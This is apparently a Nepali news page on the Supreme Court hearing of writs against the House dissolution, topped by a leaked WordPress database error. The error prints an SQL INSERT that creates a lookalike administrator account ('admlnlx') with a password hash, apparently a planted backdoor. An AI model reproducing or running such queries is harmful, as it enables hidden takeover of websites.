WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4EguERwla7blCDnPsJoDWm85C7EMr.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 12:10:24', '', 'admlnlx', 'admlnlx')
त्यसले यो बहुचर्चित मुद्दाको फैसला आउने दुई साताभित्र हुने सम्भावना बढेको छ । प्रतिनिधिसभा विघटनविरुद्धको रिटबारे जारी सुनुवाइ यसैसाताभित्र टुंग्याइसक्न विपक्षी कानुन व्यवसायीसँग आग्रह गरेका छन् । आइतवारको सुनुवाइमा राणाले सरकारी पक्षलाई मिति तोकेरै आफ्नो बहस ३० माघभित्र सक्न भनेका हुन् । प्रधानमन्त्रीको पक्षमा बहस गरिरहेका अधिवक्ता रमेश बडाललाई उनले ३० माघभित्र विपक्षीका तर्फबाट बहस सक्नुपर्ने बताए । बडालले प्रधानमन्त्रीको तर्फको बहस सकिने बताएपछि उनले सबै विपक्षीको सक्न आग्रह गरे ।
संसद विघटनविरुद्ध परेका १३ वटा रिटमा राष्ट्रपति कार्यालय, प्रधानमन्त्री तथा मन्त्रिपरिषद कार्यालय, प्रधानमन्त्री केपी शर्मा ओलीलाई विपक्षी बनाइएको छ । प्रधानमन्त्रीको पक्षबाट १९ माघदेखि बहस पैरवी भइरहेको छ । विपक्षीको बहसपछि एमिकस क्यूरीका वरिष्ठ अधिवक्तालाई समय दिने र केही दिन न्यायाधीशलाई लाग्ने प्रधानन्यायाधीश राणाले बताएका छन् ।